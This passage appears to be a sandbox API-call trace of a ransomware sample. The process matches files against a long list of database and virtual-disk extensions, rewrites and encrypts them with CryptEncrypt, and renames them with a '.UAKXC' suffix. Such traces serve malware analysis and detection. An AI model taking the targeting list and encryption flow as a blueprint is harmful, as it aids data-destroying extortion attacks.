[0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.788] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.789] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.790] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.792] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.793] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.793] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.793] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.794] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.795] SetEndOfFile (hFile=0x6c8) returned 1 [0140.795] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.795] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x14c, lpOverlapped=0x0) returned 1 [0140.795] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.795] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x14c, lpOverlapped=0x0) returned 1 [0140.795] CloseHandle (hObject=0x6c8) returned 1 [0140.799] GetProcessHeap () returned 0xea0000 [0140.799] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.799] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0140.799] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.UAKXC" [0140.799] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn.uakxc")) returned 1 [0140.800] GetProcessHeap () returned 0xea0000 [0140.800] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.800] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec98 | out: hHeap=0xea0000) returned 1 [0140.800] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6cb8 | out: hHeap=0xea0000) returned 1 [0140.800] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.800] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.800] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.801] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn")) returned 0x2022 [0140.802] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.803] GetLastError () returned 0x0 [0140.803] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=344) returned 1 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.803] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.804] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.805] StrStrIW 